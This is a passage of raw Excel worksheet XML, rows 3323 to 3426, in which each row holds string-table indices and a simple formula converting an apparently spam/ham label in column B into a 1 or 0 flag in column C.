    <row r="3323" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3323" t="s">
        <v>8438</v>
      </c>
      <c r="B3323" t="s">
        <v>5294</v>
      </c>
      <c r="C3323" s="1">
        <f>IF(B3323="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3324" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3324" t="s">
        <v>8335</v>
      </c>
      <c r="B3324" t="s">
        <v>5294</v>
      </c>
      <c r="C3324" s="1">
        <f>IF(B3324="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3325" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3325" t="s">
        <v>8439</v>
      </c>
      <c r="B3325" t="s">
        <v>5294</v>
      </c>
      <c r="C3325" s="1">
        <f>IF(B3325="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3326" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3326" t="s">
        <v>8440</v>
      </c>
      <c r="B3326" t="s">
        <v>5294</v>
      </c>
      <c r="C3326" s="1">
        <f>IF(B3326="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3327" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3327" t="s">
        <v>8441</v>
      </c>
      <c r="B3327" t="s">
        <v>5294</v>
      </c>
      <c r="C3327" s="1">
        <f>IF(B3327="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3328" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3328" t="s">
        <v>8442</v>
      </c>
      <c r="B3328" t="s">
        <v>5294</v>
      </c>
      <c r="C3328" s="1">
        <f>IF(B3328="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3329" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3329" t="s">
        <v>8443</v>
      </c>
      <c r="B3329" t="s">
        <v>5294</v>
      </c>
      <c r="C3329" s="1">
        <f>IF(B3329="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3330" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3330" t="s">
        <v>8444</v>
      </c>
      <c r="B3330" t="s">
        <v>5294</v>
      </c>
      <c r="C3330" s="1">
        <f>IF(B3330="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3331" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3331" t="s">
        <v>8445</v>
      </c>
      <c r="B3331" t="s">
        <v>5294</v>
      </c>
      <c r="C3331" s="1">
        <f>IF(B3331="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3332" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3332" t="s">
        <v>8446</v>
      </c>
      <c r="B3332" t="s">
        <v>5294</v>
      </c>
      <c r="C3332" s="1">
        <f>IF(B3332="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3333" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3333" t="s">
        <v>8447</v>
      </c>
      <c r="B3333" t="s">
        <v>5294</v>
      </c>
      <c r="C3333" s="1">
        <f>IF(B3333="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3334" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3334" t="s">
        <v>8448</v>
      </c>
      <c r="B3334" t="s">
        <v>5297</v>
      </c>
      <c r="C3334" s="1">
        <f>IF(B3334="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3335" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3335" t="s">
        <v>8449</v>
      </c>
      <c r="B3335" t="s">
        <v>5294</v>
      </c>
      <c r="C3335" s="1">
        <f>IF(B3335="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3336" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3336" t="s">
        <v>8450</v>
      </c>
      <c r="B3336" t="s">
        <v>5294</v>
      </c>
      <c r="C3336" s="1">
        <f>IF(B3336="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3337" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3337" t="s">
        <v>8451</v>
      </c>
      <c r="B3337" t="s">
        <v>5294</v>
      </c>
      <c r="C3337" s="1">
        <f>IF(B3337="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3338" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3338" t="s">
        <v>8452</v>
      </c>
      <c r="B3338" t="s">
        <v>5294</v>
      </c>
      <c r="C3338" s="1">
        <f>IF(B3338="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3339" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3339" t="s">
        <v>8453</v>
      </c>
      <c r="B3339" t="s">
        <v>5294</v>
      </c>
      <c r="C3339" s="1">
        <f>IF(B3339="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3340" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3340" t="s">
        <v>8454</v>
      </c>
      <c r="B3340" t="s">
        <v>5294</v>
      </c>
      <c r="C3340" s="1">
        <f>IF(B3340="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3341" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3341" t="s">
        <v>8455</v>
      </c>
      <c r="B3341" t="s">
        <v>5294</v>
      </c>
      <c r="C3341" s="1">
        <f>IF(B3341="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3342" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3342" t="s">
        <v>8456</v>
      </c>
      <c r="B3342" t="s">
        <v>5294</v>
      </c>
      <c r="C3342" s="1">
        <f>IF(B3342="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3343" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3343" t="s">
        <v>8457</v>
      </c>
      <c r="B3343" t="s">
        <v>5294</v>
      </c>
      <c r="C3343" s="1">
        <f>IF(B3343="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3344" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3344" t="s">
        <v>8458</v>
      </c>
      <c r="B3344" t="s">
        <v>5294</v>
      </c>
      <c r="C3344" s="1">
        <f>IF(B3344="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3345" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3345" t="s">
        <v>8459</v>
      </c>
      <c r="B3345" t="s">
        <v>5294</v>
      </c>
      <c r="C3345" s="1">
        <f>IF(B3345="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3346" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3346" t="s">
        <v>8460</v>
      </c>
      <c r="B3346" t="s">
        <v>5294</v>
      </c>
      <c r="C3346" s="1">
        <f>IF(B3346="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3347" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3347" t="s">
        <v>8461</v>
      </c>
      <c r="B3347" t="s">
        <v>5294</v>
      </c>
      <c r="C3347" s="1">
        <f>IF(B3347="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3348" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3348" t="s">
        <v>8462</v>
      </c>
      <c r="B3348" t="s">
        <v>5294</v>
      </c>
      <c r="C3348" s="1">
        <f>IF(B3348="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3349" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3349" t="s">
        <v>5376</v>
      </c>
      <c r="B3349" t="s">
        <v>5294</v>
      </c>
      <c r="C3349" s="1">
        <f>IF(B3349="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3350" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3350" t="s">
        <v>8463</v>
      </c>
      <c r="B3350" t="s">
        <v>5294</v>
      </c>
      <c r="C3350" s="1">
        <f>IF(B3350="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3351" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3351" t="s">
        <v>8464</v>
      </c>
      <c r="B3351" t="s">
        <v>5294</v>
      </c>
      <c r="C3351" s="1">
        <f>IF(B3351="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3352" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3352" t="s">
        <v>8465</v>
      </c>
      <c r="B3352" t="s">
        <v>5294</v>
      </c>
      <c r="C3352" s="1">
        <f>IF(B3352="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3353" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3353" t="s">
        <v>8466</v>
      </c>
      <c r="B3353" t="s">
        <v>5294</v>
      </c>
      <c r="C3353" s="1">
        <f>IF(B3353="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3354" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3354" t="s">
        <v>8467</v>
      </c>
      <c r="B3354" t="s">
        <v>5294</v>
      </c>
      <c r="C3354" s="1">
        <f>IF(B3354="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3355" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3355" t="s">
        <v>8468</v>
      </c>
      <c r="B3355" t="s">
        <v>5294</v>
      </c>
      <c r="C3355" s="1">
        <f>IF(B3355="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3356" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3356" t="s">
        <v>8469</v>
      </c>
      <c r="B3356" t="s">
        <v>5294</v>
      </c>
      <c r="C3356" s="1">
        <f>IF(B3356="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3357" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3357" t="s">
        <v>8470</v>
      </c>
      <c r="B3357" t="s">
        <v>5294</v>
      </c>
      <c r="C3357" s="1">
        <f>IF(B3357="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3358" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3358" t="s">
        <v>8471</v>
      </c>
      <c r="B3358" t="s">
        <v>5294</v>
      </c>
      <c r="C3358" s="1">
        <f>IF(B3358="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3359" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3359" t="s">
        <v>7591</v>
      </c>
      <c r="B3359" t="s">
        <v>5294</v>
      </c>
      <c r="C3359" s="1">
        <f>IF(B3359="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3360" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3360" t="s">
        <v>8472</v>
      </c>
      <c r="B3360" t="s">
        <v>5297</v>
      </c>
      <c r="C3360" s="1">
        <f>IF(B3360="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3361" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3361" t="s">
        <v>8473</v>
      </c>
      <c r="B3361" t="s">
        <v>5294</v>
      </c>
      <c r="C3361" s="1">
        <f>IF(B3361="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3362" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3362" t="s">
        <v>8474</v>
      </c>
      <c r="B3362" t="s">
        <v>5294</v>
      </c>
      <c r="C3362" s="1">
        <f>IF(B3362="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3363" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3363" t="s">
        <v>8475</v>
      </c>
      <c r="B3363" t="s">
        <v>5294</v>
      </c>
      <c r="C3363" s="1">
        <f>IF(B3363="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3364" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3364" t="s">
        <v>8476</v>
      </c>
      <c r="B3364" t="s">
        <v>5294</v>
      </c>
      <c r="C3364" s="1">
        <f>IF(B3364="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3365" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3365" t="s">
        <v>8477</v>
      </c>
      <c r="B3365" t="s">
        <v>5294</v>
      </c>
      <c r="C3365" s="1">
        <f>IF(B3365="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3366" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3366" t="s">
        <v>5376</v>
      </c>
      <c r="B3366" t="s">
        <v>5294</v>
      </c>
      <c r="C3366" s="1">
        <f>IF(B3366="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3367" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3367" t="s">
        <v>8478</v>
      </c>
      <c r="B3367" t="s">
        <v>5294</v>
      </c>
      <c r="C3367" s="1">
        <f>IF(B3367="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3368" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3368" t="s">
        <v>8479</v>
      </c>
      <c r="B3368" t="s">
        <v>5294</v>
      </c>
      <c r="C3368" s="1">
        <f>IF(B3368="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3369" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3369" t="s">
        <v>8480</v>
      </c>
      <c r="B3369" t="s">
        <v>5294</v>
      </c>
      <c r="C3369" s="1">
        <f>IF(B3369="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3370" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3370" t="s">
        <v>8481</v>
      </c>
      <c r="B3370" t="s">
        <v>5294</v>
      </c>
      <c r="C3370" s="1">
        <f>IF(B3370="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3371" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3371" t="s">
        <v>8482</v>
      </c>
      <c r="B3371" t="s">
        <v>5294</v>
      </c>
      <c r="C3371" s="1">
        <f>IF(B3371="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3372" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3372" t="s">
        <v>8483</v>
      </c>
      <c r="B3372" t="s">
        <v>5294</v>
      </c>
      <c r="C3372" s="1">
        <f>IF(B3372="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3373" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3373" t="s">
        <v>8484</v>
      </c>
      <c r="B3373" t="s">
        <v>5294</v>
      </c>
      <c r="C3373" s="1">
        <f>IF(B3373="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3374" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3374" t="s">
        <v>8485</v>
      </c>
      <c r="B3374" t="s">
        <v>5294</v>
      </c>
      <c r="C3374" s="1">
        <f>IF(B3374="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3375" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3375" t="s">
        <v>8486</v>
      </c>
      <c r="B3375" t="s">
        <v>5294</v>
      </c>
      <c r="C3375" s="1">
        <f>IF(B3375="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3376" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3376" t="s">
        <v>8487</v>
      </c>
      <c r="B3376" t="s">
        <v>5294</v>
      </c>
      <c r="C3376" s="1">
        <f>IF(B3376="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3377" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3377" t="s">
        <v>8488</v>
      </c>
      <c r="B3377" t="s">
        <v>5294</v>
      </c>
      <c r="C3377" s="1">
        <f>IF(B3377="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3378" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3378" t="s">
        <v>8489</v>
      </c>
      <c r="B3378" t="s">
        <v>5294</v>
      </c>
      <c r="C3378" s="1">
        <f>IF(B3378="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3379" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3379" t="s">
        <v>8490</v>
      </c>
      <c r="B3379" t="s">
        <v>5294</v>
      </c>
      <c r="C3379" s="1">
        <f>IF(B3379="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3380" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3380" t="s">
        <v>8491</v>
      </c>
      <c r="B3380" t="s">
        <v>5294</v>
      </c>
      <c r="C3380" s="1">
        <f>IF(B3380="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3381" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3381" t="s">
        <v>8492</v>
      </c>
      <c r="B3381" t="s">
        <v>5294</v>
      </c>
      <c r="C3381" s="1">
        <f>IF(B3381="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3382" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3382" t="s">
        <v>8493</v>
      </c>
      <c r="B3382" t="s">
        <v>5297</v>
      </c>
      <c r="C3382" s="1">
        <f>IF(B3382="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3383" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3383" t="s">
        <v>8494</v>
      </c>
      <c r="B3383" t="s">
        <v>5294</v>
      </c>
      <c r="C3383" s="1">
        <f>IF(B3383="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3384" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3384" t="s">
        <v>8495</v>
      </c>
      <c r="B3384" t="s">
        <v>5294</v>
      </c>
      <c r="C3384" s="1">
        <f>IF(B3384="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3385" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3385" t="s">
        <v>8496</v>
      </c>
      <c r="B3385" t="s">
        <v>5297</v>
      </c>
      <c r="C3385" s="1">
        <f>IF(B3385="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3386" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3386" t="s">
        <v>8497</v>
      </c>
      <c r="B3386" t="s">
        <v>5294</v>
      </c>
      <c r="C3386" s="1">
        <f>IF(B3386="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3387" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3387" t="s">
        <v>8498</v>
      </c>
      <c r="B3387" t="s">
        <v>5294</v>
      </c>
      <c r="C3387" s="1">
        <f>IF(B3387="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3388" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3388" t="s">
        <v>8499</v>
      </c>
      <c r="B3388" t="s">
        <v>5294</v>
      </c>
      <c r="C3388" s="1">
        <f>IF(B3388="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3389" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3389" t="s">
        <v>8500</v>
      </c>
      <c r="B3389" t="s">
        <v>5294</v>
      </c>
      <c r="C3389" s="1">
        <f>IF(B3389="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3390" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3390" t="s">
        <v>8501</v>
      </c>
      <c r="B3390" t="s">
        <v>5294</v>
      </c>
      <c r="C3390" s="1">
        <f>IF(B3390="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3391" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3391" t="s">
        <v>8502</v>
      </c>
      <c r="B3391" t="s">
        <v>5297</v>
      </c>
      <c r="C3391" s="1">
        <f>IF(B3391="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3392" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3392" t="s">
        <v>5876</v>
      </c>
      <c r="B3392" t="s">
        <v>5294</v>
      </c>
      <c r="C3392" s="1">
        <f>IF(B3392="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3393" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3393" t="s">
        <v>8503</v>
      </c>
      <c r="B3393" t="s">
        <v>5294</v>
      </c>
      <c r="C3393" s="1">
        <f>IF(B3393="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3394" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3394" t="s">
        <v>8002</v>
      </c>
      <c r="B3394" t="s">
        <v>5294</v>
      </c>
      <c r="C3394" s="1">
        <f>IF(B3394="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3395" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3395" t="s">
        <v>8504</v>
      </c>
      <c r="B3395" t="s">
        <v>5294</v>
      </c>
      <c r="C3395" s="1">
        <f>IF(B3395="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3396" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3396" t="s">
        <v>8505</v>
      </c>
      <c r="B3396" t="s">
        <v>5294</v>
      </c>
      <c r="C3396" s="1">
        <f>IF(B3396="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3397" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3397" t="s">
        <v>8506</v>
      </c>
      <c r="B3397" t="s">
        <v>5297</v>
      </c>
      <c r="C3397" s="1">
        <f>IF(B3397="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3398" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3398" t="s">
        <v>8507</v>
      </c>
      <c r="B3398" t="s">
        <v>5294</v>
      </c>
      <c r="C3398" s="1">
        <f>IF(B3398="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3399" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3399" t="s">
        <v>8508</v>
      </c>
      <c r="B3399" t="s">
        <v>5294</v>
      </c>
      <c r="C3399" s="1">
        <f>IF(B3399="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3400" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3400" t="s">
        <v>8509</v>
      </c>
      <c r="B3400" t="s">
        <v>5294</v>
      </c>
      <c r="C3400" s="1">
        <f>IF(B3400="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3401" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3401" t="s">
        <v>5361</v>
      </c>
      <c r="B3401" t="s">
        <v>5297</v>
      </c>
      <c r="C3401" s="1">
        <f>IF(B3401="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3402" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3402" t="s">
        <v>8510</v>
      </c>
      <c r="B3402" t="s">
        <v>5294</v>
      </c>
      <c r="C3402" s="1">
        <f>IF(B3402="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3403" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3403" t="s">
        <v>8511</v>
      </c>
      <c r="B3403" t="s">
        <v>5294</v>
      </c>
      <c r="C3403" s="1">
        <f>IF(B3403="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3404" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3404" t="s">
        <v>7291</v>
      </c>
      <c r="B3404" t="s">
        <v>5294</v>
      </c>
      <c r="C3404" s="1">
        <f>IF(B3404="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3405" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3405" t="s">
        <v>8512</v>
      </c>
      <c r="B3405" t="s">
        <v>5294</v>
      </c>
      <c r="C3405" s="1">
        <f>IF(B3405="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3406" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3406" t="s">
        <v>8513</v>
      </c>
      <c r="B3406" t="s">
        <v>5294</v>
      </c>
      <c r="C3406" s="1">
        <f>IF(B3406="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3407" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3407" t="s">
        <v>8514</v>
      </c>
      <c r="B3407" t="s">
        <v>5294</v>
      </c>
      <c r="C3407" s="1">
        <f>IF(B3407="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3408" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3408" t="s">
        <v>7233</v>
      </c>
      <c r="B3408" t="s">
        <v>5294</v>
      </c>
      <c r="C3408" s="1">
        <f>IF(B3408="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3409" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3409" t="s">
        <v>8515</v>
      </c>
      <c r="B3409" t="s">
        <v>5297</v>
      </c>
      <c r="C3409" s="1">
        <f>IF(B3409="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3410" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3410" t="s">
        <v>8516</v>
      </c>
      <c r="B3410" t="s">
        <v>5294</v>
      </c>
      <c r="C3410" s="1">
        <f>IF(B3410="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3411" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3411" t="s">
        <v>8517</v>
      </c>
      <c r="B3411" t="s">
        <v>5294</v>
      </c>
      <c r="C3411" s="1">
        <f>IF(B3411="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3412" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3412" t="s">
        <v>8518</v>
      </c>
      <c r="B3412" t="s">
        <v>5294</v>
      </c>
      <c r="C3412" s="1">
        <f>IF(B3412="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3413" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3413" t="s">
        <v>8519</v>
      </c>
      <c r="B3413" t="s">
        <v>5294</v>
      </c>
      <c r="C3413" s="1">
        <f>IF(B3413="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3414" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3414" t="s">
        <v>8520</v>
      </c>
      <c r="B3414" t="s">
        <v>5294</v>
      </c>
      <c r="C3414" s="1">
        <f>IF(B3414="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3415" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3415" t="s">
        <v>8521</v>
      </c>
      <c r="B3415" t="s">
        <v>5294</v>
      </c>
      <c r="C3415" s="1">
        <f>IF(B3415="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3416" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3416" t="s">
        <v>7843</v>
      </c>
      <c r="B3416" t="s">
        <v>5294</v>
      </c>
      <c r="C3416" s="1">
        <f>IF(B3416="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3417" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3417" t="s">
        <v>8522</v>
      </c>
      <c r="B3417" t="s">
        <v>5294</v>
      </c>
      <c r="C3417" s="1">
        <f>IF(B3417="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3418" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3418" t="s">
        <v>8523</v>
      </c>
      <c r="B3418" t="s">
        <v>5294</v>
      </c>
      <c r="C3418" s="1">
        <f>IF(B3418="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3419" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3419" t="s">
        <v>8524</v>
      </c>
      <c r="B3419" t="s">
        <v>5297</v>
      </c>
      <c r="C3419" s="1">
        <f>IF(B3419="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3420" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3420" t="s">
        <v>8525</v>
      </c>
      <c r="B3420" t="s">
        <v>5297</v>
      </c>
      <c r="C3420" s="1">
        <f>IF(B3420="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3421" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3421" t="s">
        <v>8526</v>
      </c>
      <c r="B3421" t="s">
        <v>5297</v>
      </c>
      <c r="C3421" s="1">
        <f>IF(B3421="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3422" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3422" t="s">
        <v>8527</v>
      </c>
      <c r="B3422" t="s">
        <v>5297</v>
      </c>
      <c r="C3422" s="1">
        <f>IF(B3422="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3423" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3423" t="s">
        <v>8528</v>
      </c>
      <c r="B3423" t="s">
        <v>5297</v>
      </c>
      <c r="C3423" s="1">
        <f>IF(B3423="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3424" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3424" t="s">
        <v>8529</v>
      </c>
      <c r="B3424" t="s">
        <v>5297</v>
      </c>
      <c r="C3424" s="1">
        <f>IF(B3424="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3425" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3425" t="s">
        <v>8530</v>
      </c>
      <c r="B3425" t="s">
        <v>5297</v>
      </c>
      <c r="C3425" s="1">
        <f>IF(B3425="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3426" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3426" t="s">
        <v>8531</v>
      </c>
      <c r="B3426" t="s">
        <v>5294</v>
      </c>
      <c r="C3426" s="1">
        <f>IF(B3426="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
